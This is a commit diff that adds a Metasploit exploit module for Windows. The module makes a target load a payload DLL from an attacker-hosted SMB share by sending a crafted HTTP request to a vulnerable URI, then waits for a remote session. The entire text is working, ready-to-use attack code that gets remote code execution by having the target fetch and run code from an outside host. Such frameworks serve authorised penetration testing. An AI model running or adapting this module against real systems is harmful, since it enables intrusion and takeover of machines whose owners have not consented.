Update rapid7#3076 branch

jvazquez-r7 · jvazquez-r7 · commit d4738d8c0a7e · 2015-03-04T15:51:00.000-06:00
diff --git a/modules/exploits/windows/http/generic_http_dll_server.rb b/modules/exploits/windows/http/generic_http_dll_server.rb
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module
+# to serve an arbitrary DLL over HTTP 
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'HTTP DLL Server',
+      'Description'   => %q{
+          This is a general-purpose module for exploiting conditions where a HTTP request 
+          triggers a DLL load from a specified SMB share. This module serves payloads as 
+          DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would 
+          trigger the load of the DLL.
+      },
+      'Author'      => [
+        'Matthew Hall <hallm@sec-1.com>',
+      ],
+      'Platform'       => 'win',
+      'Privileged'     => true,
+      'Arch'         => ARCH_X86, 
+      'References'     =>
+        [
+          [ 'URL', 'http://www.sec-1.com/blog/'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => true,
+      'Platform'       => [ 'win'],
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
+      ))
+      register_options(
+        [
+          OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll']),
+          OptString.new('URI',      [true,  'Path to vulnerable URI (last argument will be the location of the file shared)', '/path/to/vulnerable/function.ext?argument=' ]),
+          OptBool.new('StripExt',   [false, 'Boolean to whether I should strip the file extension (e.g. foo.dll => foo)', true]),
+        ], self.class)
+      deregister_options('FILE_CONTENTS')
+  end
+
+  def primer 
+    self.file_contents = generate_payload_dll
+    print_status("File available on #{unc}...")
+    if datastore['StripExt']
+      share = "#{unc}".gsub(/\.dll/,'')
+    else
+      share = "#{unc}"
+    end
+    print_status("Requesting DLL load to #{datastore['RHOST']}:#{datastore['RPORT']} from #{share}")
+
+    sploit = datastore['URI'] 
+    sploit << share
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => sploit
+    }, 5)
+
+    # Wait 30 seconds for session to be created
+    1.upto(30) do
+      break if session_created?
+      sleep(1) 
+    end
+    disconnect
+  end
+end
